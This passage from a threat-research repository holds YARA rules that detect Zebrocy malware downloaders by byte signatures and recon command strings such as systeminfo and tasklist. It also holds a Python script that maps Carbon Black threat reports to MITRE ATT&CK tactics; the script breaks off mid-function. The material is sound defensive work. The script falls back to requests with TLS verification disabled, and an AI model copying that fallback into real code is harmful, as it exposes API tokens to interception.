166 |     $0x4a1e24 = { 8D 45 ?? 50 B9 ?? ?? ?? ?? 8B D3 8B 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C7 E8 }
167 |     $0x4a1e67 = { 33 C0 5A 59 59 64 89 10 68 }
168 |     $0x4a1e74 = { 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 }
169 |     $0x4a1e89 = { 5F 5E 5B 8B E5 5D C3 }    
170 |     // hex string
171 |     $hex_word = "4D6963726F736F667420576F7264" // Microsoft Word
172 |     $hex_repair = "636F756C64206E6F742062652072657061697265642E" // could not be repaired.
173 |     $hex_entpass = "456E7465722070617373776F726420746F206F70656E2066696C65" // Enter password to open file
174 |   condition:
175 |     all of ($0x4a1*) and any of ($hex*)
176 | }
177 | 
178 | rule fancybear_zebrocy_downloader2_delphi : TAU RU APT
179 | {
180 |   meta:
181 |     author = "CarbonBlack Threat Research" // tharuyama
182 |     date = "2019-Mar-11"
183 |     description = "Designed to catch Zebrocy Downloader Type 2 Delphi"
184 |     rule_version = 1
185 | 	yara_version = "3.8.1"
186 | 	Confidence = "Prod"
187 | 	Priority = "High"
188 |     TLP = "White"
189 |     exemplar_hashes = "56e2221cddc9b12cd1021f4da804e52658e515082c8600b6ae77fe628247e002, 427b9130cca7217692673fb0e9017cbc61dc295fcde381360cc893f6e96e4092"
190 |   strings:
191 |     // fn_decode_string
192 |     $0x6846c8 = { 55 8B EC 83 C4 ?? 33 C9 89 4D ?? 89 4D ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 83 7D }
193 |     $0x684709 = { 8B 45 ?? 83 E8 ?? 8B 00 89 45 }
194 |     $0x684714 = { 8B 45 ?? 85 C0 }
195 |     $0x68471b = { 89 45 ?? C7 45 }
196 |     $0x68472f = { 48 83 C8 ?? 40 }
197 |     $0x684737 = { 8D 45 ?? 50 B9 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 [0-1] 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 }    
198 |     $0x684784 = { 33 C0 5A 59 59 64 89 10 68 }
199 |     $0x684791 = { 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 }
200 |     $0x6847ae = { 8B E5 5D C3 }
201 |     // fn_send_HTTP_POST
202 |     $0x652178 = { 55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 8B F9 8B F2 89 45 ?? 8B 5D ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8B 45 ?? 80 78 }
203 |     $0x6521b5 = { 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 50 8B 45 ?? 50 8B 45 ?? 50 8D 45 ?? 50 8B 45 ?? 8B 40 ?? 8B CF 8B D6 E8 ?? ?? ?? ?? 8B 55 ?? 8B C3 B9 ?? ?? ?? ?? E8 }
204 |     $0x6521ee = { 8B 45 ?? 50 8B 45 ?? 50 8B 45 ?? 50 53 8B 45 ?? 8B 40 ?? 8B CF 8B D6 E8 ?? ?? ?? ?? 8B 0B 8B 55 ?? 8B 45 ?? E8 }
205 |     $0x652217 = { 33 C0 5A 59 59 64 89 10 }
206 |     $0x652245 = { 33 C0 5A 59 59 64 89 10 68 }
207 |     $0x652252 = { 8D 45 ?? E8 ?? ?? ?? ?? C3 }
208 |     $0x652262 = { 5F 5E 5B 59 59 5D C2 }
209 |     // fn_CreateDir
210 |     $0x425760 = { 55 8B EC 33 C9 51 51 51 51 53 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B3 ?? 83 7D }
211 |     $0x42578b = { 8B 0D ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 C7 42 ?? ?? ?? ?? ?? 8B C2 E8 }
212 |     $0x4257ad = { 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 }
213 |     $0x4257d1 = { 8B 45 ?? 85 C0 }
214 |     $0x4257d8 = { 83 E8 ?? 8B 00 }
215 |     $0x4257e6 = { 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 0F 94 C0 }
216 |     $0x425803 = { 8B 45 ?? E8 ?? ?? ?? ?? 8B D8 }
217 |     $0x42580f = { 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 }
218 |     $0x425826 = { 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 }
219 |     $0x425838 = { 33 C0 5A 59 59 64 89 10 68 }
220 |     $0x425845 = { 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 }
221 |     $0x42585a = { 8B C3 5B 8B E5 5D C3 }    
222 |   condition:
223 |     all of them
224 | }
225 | 
226 | rule fancybear_zebrocy_downloader1_go {
227 |   meta:
228 |     author = "CarbonBlack Threat Research" // tharuyama
229 |     date = "2019-Mar-15"
230 |     description = "Designed to catch Zebrocy Downloader Type 1 Go"
231 |     rule_version = 1
232 | 	yara_version = "3.8.1"
233 | 	Confidence = "Prod"
234 | 	Priority = "High"
235 |     TLP = "White"
236 |     exemplar_hashes = "fcf03bf5ef4babce577dd13483391344e957fd2c855624c9f0573880b8cba62e"
237 |   strings:
238 |     // fn_main_decode_string
239 |     $0x5c8670 = { 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 }
240 |     $0x5c8682 = { 83 EC ?? 8B 44 24 ?? 89 04 24 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 44 24 ?? 89 4C 24 ?? 83 C4 ?? C3 }
241 |     // hex string
242 |     $hex_wmi = "776D6963206C6F676963616C6469736B206765742063617074696F6E2C6465736372697074696F6E2C6472697665747970652C70726F76696465726E616D652C73697A65" // wmic logicaldisk get caption,description,drivetype,providername,size
243 |     $hex_sysinfo = "73797374656D696E666F" // systeminfo
244 |     $hex_tasklst = "7461736B6C697374" // tasklist
245 |   condition:
246 |     all of ($0x5c8*) and 2 of ($hex*)
247 | }
248 | 
249 | rule fancybear_zebrocy_downloader2_go {
250 |   meta:
251 |     author = "CarbonBlack Threat Research" // tharuyama
252 |     date = "2019-Mar-15"
253 |     description = "Designed to catch Zebrocy Downloader Type 2 Go"
254 |     rule_version = 1
255 | 	yara_version = "3.8.1"
256 | 	Confidence = "Prod"
257 | 	Priority = "High"
258 |     TLP = "White"
259 |     exemplar_hashes = "50d610226aa646dd643fab350b48219626918305aaa86f9dbd356c78a19204cc"
260 |   strings:
261 |     // fn_main_save_file
262 |     $0x5aeaf0 = { 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 8D 44 24 ?? 3B 41 }
263 |     $0x5aeb0a = { 81 EC ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 85 C0 }
264 |     $0x5aeb62 = { 89 44 24 ?? 89 4C 24 ?? 8B 01 8B 51 ?? 89 04 24 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 89 8C 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 8D 15 ?? ?? ?? ?? 89 14 24 8D 9C 24 ?? ?? ?? ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 8C 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 F8 }
265 |     $0x5aec0a = { 8B 4C 24 ?? 0F B7 11 66 81 FA }
266 |     $0x5aec18 = { 0F B6 51 ?? 80 FA }
267 |     $0x5aec25 = { 8B 54 24 ?? 83 FA }
268 |     $0x5aec32 = { 8B 44 24 ?? 8B 48 ?? 8B 50 ?? 89 0C 24 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 89 4C 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 8D 15 ?? ?? ?? ?? 89 14 24 8D 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 44 24 ?? 89 8C 24 ?? ?? ?? ?? 8D 44 24 ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? BA ?? ?? ?? ?? 31 DB 31 ED }
269 |     $0x5aeccb = { 89 54 24 ?? 8D 04 D1 8B 70 ?? 8B 00 89 44 24 ?? 89 74 24 ?? C7 04 24 ?? ?? ?? ?? 89 6C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 50 ?? 8B 6C 24 ?? 8B 5C 24 ?? 8B 44 24 ?? 8B 4C 24 }
270 |     $0x5aed15 = { 89 2C 24 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 54 24 ?? 89 54 24 ?? 8B 5C 24 ?? 85 DB }
271 |     $0x5aed45 = { 8B 44 24 ?? 89 04 24 8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 31 D2 31 DB 31 ED }
272 |     $0x5aed86 = { 89 5C 24 ?? 89 6C 24 ?? 89 54 24 ?? 8D 0C D0 89 4C 24 ?? 89 4C 24 ?? 8D 1D ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 44 24 ?? 89 4C 24 ?? 8D 44 24 ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 08 8B 40 ?? 89 4C 24 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 50 ?? 8B 5C 24 ?? 8B 6C 24 ?? 8B 44 24 ?? 8B 4C 24 }
273 |     $0x5aee2d = { 8D 71 ?? 39 F2 }
274 |     $0x5aee34 = { C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 39 CA }
275 |     $0x5aee51 = { 89 1C 24 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 }
276 |     $0x5aee93 = { 8B 44 24 ?? 89 04 24 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 }
277 |     $0x5aeeea = { 90 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 }
278 |     $0x5aeef7 = { C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? 8D 0D ?? ?? ?? ?? 89 4C 24 ?? 8D 4C 24 ?? 89 0C 24 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 }
279 |     $0x5aef3c = { 89 8C 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 }
280 |     // fn_main_os_Getenv
281 |     $0x5ae8d0 = { 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 }
282 |     $0x5ae8e6 = { 83 EC ?? 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 89 14 24 8B 54 24 ?? 89 54 24 ?? 8D 15 ?? ?? ?? ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 89 14 24 8B 54 24 ?? 89 54 24 ?? 8D 15 ?? ?? ?? ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 89 14 24 8B 54 24 ?? 89 54 24 ?? 8D 15 ?? ?? ?? ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 44 24 ?? 89 4C 24 ?? 83 C4 ?? C3 }
283 |   condition:
284 |     all of them    
285 | }
286 | 


--------------------------------------------------------------------------------
/navgen/navgen.py:
--------------------------------------------------------------------------------
  1 | import requests
  2 | import json
  3 | import re
  4 | import time
  5 | import pprint
  6 | 
  7 | 
  8 | def get_auth():
  9 |     """this will ask for auth info to CbR instance and return it"""
 10 |     print("[!] To find your API key, login to your Cb Response UI and navigate to the profile section.")
 11 | 
 12 |     full_url = input("[!] Here, enter the full url of your Cb Response instance. Example: https://bugcrowd.my.carbonblack.io\n[*] > ")
 13 |     if "https://" not in full_url:
 14 |         full_url = "https://" + full_url
 15 | 
 16 |     while True:
 17 |         api_key = input("[*] Enter your API key: > ")
 18 |         if len(api_key) != 40:
 19 |             print("[!] Invalid token. Try again.")
 20 |             continue
 21 |         else:
 22 |             break
 23 | 
 24 |     return api_key, full_url
 25 | 
 26 | 
 27 | def download_reports(api_key, url):
 28 |     """
 29 |     This will download threat reports for following feeds:
 30 |         attackframework
 31 |         sans
 32 |         Bit9AdvancedThreats
 33 |         Bit9SuspiciousIndicators
 34 |         Bit9EndpointVisibility
 35 |         CbCommunity
 36 |         Bit9EarlyAccess
 37 |     and return json object
 38 |     """
 39 |     headers = {
 40 |         'Content-Type': 'application/json',
 41 |         'X-Auth-Token': api_key
 42 |     }
 43 | 
 44 |     # this will create a full url to get total number of reports.
 45 |     full_url = url + "/api/v1/threat_report?cb.urlver=1&cb.fq.feed_name=attackframework&cb.fq.feed_name=bit9advancedthreats&cb.fq.feed_name=cbcommunity&cb.fq.feed_name=sans&cb.fq.feed_name=bit9endpointvisibility&cb.fq.feed_name=bit9suspiciousindicators&cb.fq.feed_name=bit9earlyaccess&sort=severity_score%20desc&rows=10&facet=false&start=0&cb.fq.is_deleted=false"
 46 |     try:
 47 |         r = requests.get(full_url, headers=headers)
 48 |     except:
 49 |         r = requests.get(full_url, headers=headers, verify=False)
 50 | 
 51 |     # store results as json
 52 |     data = r.json()
 53 | 
 54 |     # gets the number of total threat reports found.
 55 |     total_results = data['total_results']
 56 |     print("There are {} total threat reports found.".format(total_results))
 57 | 
 58 |     # we need to determine how many requests in batches of 100 we need to make to download threat reports in
 59 |     paginate_count = total_results // 100 + 1
 60 |     data = []
 61 | 
 62 |     # depending on what pagiante_count is, we need to make this many requests to download threat report
 63 |     for i in range(paginate_count):
 64 |         full_url = url + "/api/v1/threat_report?cb.urlver=1&cb.fq.feed_name=attackframework&cb.fq.feed_name=bit9advancedthreats&cb.fq.feed_name=cbcommunity&cb.fq.feed_name=sans&cb.fq.feed_name=bit9endpointvisibility&cb.fq.feed_name=bit9suspiciousindicators&cb.fq.feed_name=bit9earlyaccess&sort=severity_score%20desc&rows=100&facet=false&start=" + str(i * 100) + "&cb.fq.is_deleted=false"
 65 |         try:
 66 |             r = requests.get(full_url, headers=headers)
 67 |         except:
 68 |             r = requests.get(full_url, headers=headers, verify=False)
 69 | 
 70 |         # append 100 batch threat report to data object
 71 |         data += r.json()['results']
 72 | 
 73 |     return data
 74 | 
 75 | 
 76 | def reports_stats(data):
 77 |     """ check to see if feeds are all enabled, and report """
 78 |     list_of_ignored = []
 79 |     for report in data:
 80 |         if report['is_ignored'] is True:
 81 |             list_of_ignored.append(report['id'])
 82 |     if list_of_ignored:
 83 |         print("\n[!] Heads up! The following report ID's are ignored within your Threat Intelligence page. Your final output may be affected.")
 84 |         for ids in list_of_ignored:
 85 |             print("\t{}".format(ids))
 86 | 
 87 | 
 88 | def hardcoded_tids(tid, comment):
 89 |     """ Some threat reports aren't tagged with a TID. """
 90 |     my_new_list =[] 
 91 |     if get_tactic(tid.lower()) is not None:
 92 |         for tactic in get_tactic(tid.lower()):
 93 |             my_new_list.append(create_dict(tid, 100, comment, tactic))
 94 | 
 95 |     return my_new_list
 96 | 
 97 | 
 98 | def create_dict(tid, score, comment, tactic):
 99 |     """ this will accept specific parameters and return a dictionary of a
100 |     specific technique. It will be appended to the "techniques" key in
101 |      Navigator JSON. """
102 | 
103 |     color = get_color(score)
104 | 
105 |     nav_techniques = {
106 |         "techniqueID": tid.upper(),
107 |         "tactic": tactic,
108 |         "color": color,
109 |         "comment": comment,
110 |         "enabled": True
111 |     }
112 | 
113 |     return nav_techniques
114 | 
115 | 
116 | def get_tactic(tid):
117 |     # we should generate this dict by scraping https://attack.mitre.org/wiki/All_Techniques
118 |     """ this will accept a tid, and return a list of tactics"""
119 |     attack_dict = {
120 |         "t1156": ["persistence"],
121 |         "t1134": ["defense-evasion", "privilege-escalation"],
122 |         "t1015": ["persistence", "privilege-escalation"],
123 |         "t1087": ["discovery"],
124 |         "t1098": ["credential-access"],
125 |         "t1182": ["persistence", "privilege-escalation"],
126 |         "t1103": ["persistence", "privilege-escalation"],
127 |         "t1155": ["execution", "lateral-movement"],
128 |         "t1017": ["lateral-movement"],
129 |         "t1138": ["persistence", "privilege-escalation"],
130 |         "t1010": ["discovery"],
131 |         "t1123": ["collection"],
132 |         "t1131": ["persistence"],
133 |         "t1119": ["collection"],
134 |         "t1020": ["exfiltration"],
135 |         "t1197": ["defense-evasion", "persistence"],
136 |         "t1139": ["credential-access"],
137 |         "t1009": ["defense-evasion"],
138 |         "t1067": ["persistence"],
139 |         "t1217": ["discovery"],
140 |         "t1176": ["persistence"],
141 |         "t1110": ["credential-access"],
142 |         "t1088": ["defense-evasion", "privilege-escalation"],
143 |         "t1191": ["defense-evasion", "execution"],
144 |         "t1042": ["persistence"],
145 |         "t1146": ["defense-evasion"],
146 |         "t1115": ["collection"],
147 |         "t1116": ["defense-evasion"],
148 |         "t1059": ["execution"],
149 |         "t1043": ["command-and-control"],
150 |         "t1092": ["command-and-control"],
151 |         "t1109": ["defense-evasion", "persistence"],
152 |         "t1122": ["defense-evasion", "persistence"],
153 |         "t1090": ["command-and-control"],
154 |         "t1196": ["defense-evasion", "execution"],
155 |         "t1136": ["persistence"],
156 |         "t1003": ["credential-access"],
157 |         "t1081": ["credential-access"],
158 |         "t1214": ["credential-access"],
159 |         "t1094": ["command-and-control"],
160 |         "t1024": ["command-and-control"],
161 |         "t1207": ["defense-evasion"],
162 |         "t1038": ["defense-evasion", "persistence", "privilege-escalation"],
163 |         "t1073": ["defense-evasion"],
164 |         "t1002": ["exfiltration"],
165 |         "t1132": ["command-and-control"],
166 |         "t1022": ["exfiltration"],
167 |         "t1001": ["command-and-control"],
168 |         "t1074": ["collection"],
169 |         "t1030": ["exfiltration"],
170 |         "t1213": ["collection"],
171 |         "t1005": ["collection"],
172 |         "t1039": ["collection"],
173 |         "t1025": ["collection"],
174 |         "t1140": ["defense-evasion"],
175 |         "t1089": ["defense-evasion"],
176 |         "t1175": ["lateral-movement"],
177 |         "t1172": ["command-and-control"],
178 |         "t1189": ["initial-access"],
179 |         "t1157": ["persistence", "privilege-escalation"],
180 |         "t1173": ["execution"],
181 |         "t1114": ["collection"],
182 |         "t1106": ["execution"],
183 |         "t1129": ["execution"],
184 |         "t1048": ["exfiltration"],
185 |         "t1041": ["exfiltration"],
186 |         "t1011": ["exfiltration"],
187 |         "t1052": ["exfiltration"],
188 |         "t1190": ["initial-access"],
189 |         "t1203": ["execution"],
190 |         "t1212": ["credential-access"],
191 |         "t1211": ["defense-evasion"],
192 |         "t1068": ["privilege-escalation"],
193 |         "t1210": ["lateral-movement"],
194 |         "t1133": ["persistence"],
195 |         "t1181": ["defense-evasion", "privilege-escalation"],
196 |         "t1008": ["command-and-control"],
197 |         "t1107": ["defense-evasion"],
198 |         "t1006": ["defense-evasion"],
199 |         "t1044": ["persistence", "privilege-escalation"],
200 |         "t1083": ["discovery"],
201 |         "t1187": ["credential-access"],
202 |         "t1144": ["defense-evasion"],
203 |         "t1061": ["execution"],
204 |         "t1148": ["defense-evasion"],
205 |         "t1200": ["initial-access"],
206 |         "t1158": ["defense-evasion", "persistence"],
207 |         "t1147": ["defense-evasion"],
208 |         "t1143": ["defense-evasion"],
209 |         "t1179": ["credential-access", "persistence", "privilege-escalation"],
210 |         "t1062": ["persistence"],
211 |         "t1183": ["defense-evasion", "persistence", "privilege-escalation"],
212 |         "t1054": ["defense-evasion"],
213 |         "t1066": ["defense-evasion"],
214 |         "t1070": ["defense-evasion"],
215 |         "t1202": ["defense-evasion"],
216 |         "t1056": ["collection", "credential-access"],
217 |         "t1141": ["credential-access"],
218 |         "t1130": ["defense-evasion"],
219 |         "t1118": ["defense-evasion", "execution"],
220 |         "t1208": ["credential-access"],
221 |         "t1215": ["persistence"],
222 |         "t1142": ["credential-access"],
223 |         "t1161": ["persistence"],
224 |         "t1149": ["defense-evasion"],
225 |         "t1171": ["credential-access"],
226 |         "t1177": ["execution", "persistence"],
227 |         "t1159": ["persistence"],
228 |         "t1160": ["persistence", "privilege-escalation"],
229 |         "t1152": ["defense-evasion", "execution", "persistence"],
230 |         "t1168": ["persistence", "execution"],
231 |         "t1162": ["persistence"],
232 |         "t1037": ["lateral-movement", "persistence"],
233 |         "t1185": ["collection"],
234 |         "t1036": ["defense-evasion"],
235 |         "t1031": ["persistence"],
236 |         "t1112": ["defense-evasion"],
237 |         "t1170": ["defense-evasion", "execution"],
238 |         "t1104": ["command-and-control"],
239 |         "t1188": ["command-and-control"],
240 |         "t1026": ["command-and-control"],
241 |         "t1079": ["command-and-control"],
242 |         "t1096": ["defense-evasion"],
243 |         "t1128": ["persistence"],
244 |         "t1046": ["discovery"],
245 |         "t1126": ["defense-evasion"],
246 |         "t1135": ["discovery"],
247 |         "t1040": ["credential-access", "discovery"],
248 |         "t1050": ["persistence", "privilege-escalation"],
249 |         "t1027": ["defense-evasion"],
250 |         "t1137": ["persistence"],
251 |         "t1075": ["lateral-movement"],
252 |         "t1097": ["lateral-movement"],
253 |         "t1174": ["credential-access"],
254 |         "t1201": ["discovery"],
255 |         "t1034": ["persistence", "privilege-escalation"],
256 |         "t1120": ["discovery"],
257 |         "t1069": ["discovery"],
258 |         "t1150": ["defense-evasion", "persistence", "privilege-escalation"],
259 |         "t1205": ["command-and-control", "defense-evasion", "persistence"],
260 |         "t1013": ["persistence", "privilege-escalation"],
261 |         "t1086": ["execution"],
262 |         "t1145": ["credential-access"],
263 |         "t1057": ["discovery"],
264 |         "t1186": ["defense-evasion"],
265 |         "t1093": ["defense-evasion"],
266 |         "t1055": ["defense-evasion", "privilege-escalation"],
267 |         "t1012": ["discovery"],
268 |         "t1163": ["persistence"],
269 |         "t1164": ["persistence"],
270 |         "t1108": ["defense-evasion", "persistence"],
271 |         "t1060": ["persistence"],
272 |         "t1121": ["defense-evasion", "execution"],
273 |         "t1117": ["defense-evasion", "execution"],
274 |         "t1219": ["command-and-control"],
275 |         "t1076": ["lateral-movement"],
276 |         "t1105": ["command-and-control", "lateral-movement"],
277 |         "t1021": ["lateral-movement"],
278 |         "t1018": ["discovery"],
279 |         "t1091": ["lateral-movement", "initial-access"],
280 |         "t1014": ["defense-evasion"],
281 |         "t1085": ["defense-evasion", "execution"],
282 |         "t1178": ["privilege-escalation"],
283 |         "t1198": ["defense-evasion", "persistence"],
284 |         "t1184": ["lateral-movement"],
285 |         "t1053": ["execution", "persistence", "privilege-escalation"],
286 |         "t1029": ["exfiltration"],
287 |         "t1113": ["collection"],
288 |         "t1180": ["persistence"],
289 |         "t1064": ["defense-evasion", "execution"],
290 |         "t1063": ["discovery"],
291 |         "t1101": ["persistence"],
292 |         "t1167": ["credential-access"],
293 |         "t1035": ["execution"],
294 |         "t1058": ["persistence", "privilege-escalation"],
295 |         "t1166": ["privilege-escalation"],
296 |         "t1051": ["lateral-movement"],
297 |         "t1023": ["persistence"],
298 |         "t1218": ["defense-evasion", "execution"],
299 |         "t1216": ["defense-evasion", "execution"],
300 |         "t1045": ["defense-evasion"],
301 |         "t1153": ["execution"],
302 |         "t1151": ["defense-evasion", "execution"],
303 |         "t1193": ["initial-access"],
304 |         "t1192": ["initial-access"],
305 |         "t1194": ["initial-access"],
306 |         "t1071": ["command-and-control"],
307 |         "t1032": ["command-and-control"],
308 |         "t1095": ["command-and-control"],
309 |         "t1165": ["persistence", "privilege-escalation"],
310 |         "t1169": ["privilege-escalation"],
311 |         "t1206": ["privilege-escalation"],
312 |         "t1195": ["initial-access"],
313 |         "t1019": ["persistence"],
314 |         "t1082": ["discovery"],
315 |         "t1016": ["discovery"],
316 |         "t1049": ["discovery"],
317 |         "t1033": ["discovery"],
318 |         "t1007": ["discovery"],
319 |         "t1124": ["discovery"],
320 |         "t1080": ["lateral-movement"],
321 |         "t1072": ["execution", "lateral-movement"],
322 |         "t1209": ["persistence"],
323 |         "t1099": ["defense-evasion"],
324 |         "t1154": ["execution", "persistence"],
325 |         "t1127": ["defense-evasion", "execution"],
326 |         "t1199": ["initial-access"],
327 |         "t1111": ["credential-access"],
328 |         "t1065": ["command-and-control"],
329 |         "t1204": ["execution"],
330 |         "t1078": ["defense-evasion", "persistence", "privilege-escalation", "initial-access"],
331 |         "t1125": ["collection"],
332 |         "t1102": ["command-and-control", "defense-evasion"],
333 |         "t1100": ["persistence", "privilege-escalation"],
334 |         "t1077": ["lateral-movement"],
335 |         "t1047": ["execution"],
336 |         "t1084": ["persistence"],
337 |         "t1028": ["execution", "lateral-movement"],
338 |         "t1004": ["persistence"],
339 |         "t1222": ["defense-evasion"],
340 |         "t1220": ["defense-evasion", "execution"]
341 |     }
342 | 
343 |     tactics = attack_dict.get(tid, None)
344 |     return tactics
345 | 
346 | 
347 | def generate_tid_dict(threat_reports):
348 |     """this will return a dictionary with TID's as keys. Values will be a list of all threat reports for that TID"""
349 |     tid_dict = {}
350 |     pattern = "t\d{4}"
351 | 
352 |     for threat_report in threat_reports:
353 |         #print(threat_report['tags'])
354 |         # grab all the supported OS tags
355 |         if "windows" in threat_report['tags'] or "linux" in threat_report['tags'] or "macos" in threat_report['tags']:
356 |             for tag in threat_report['tags']:
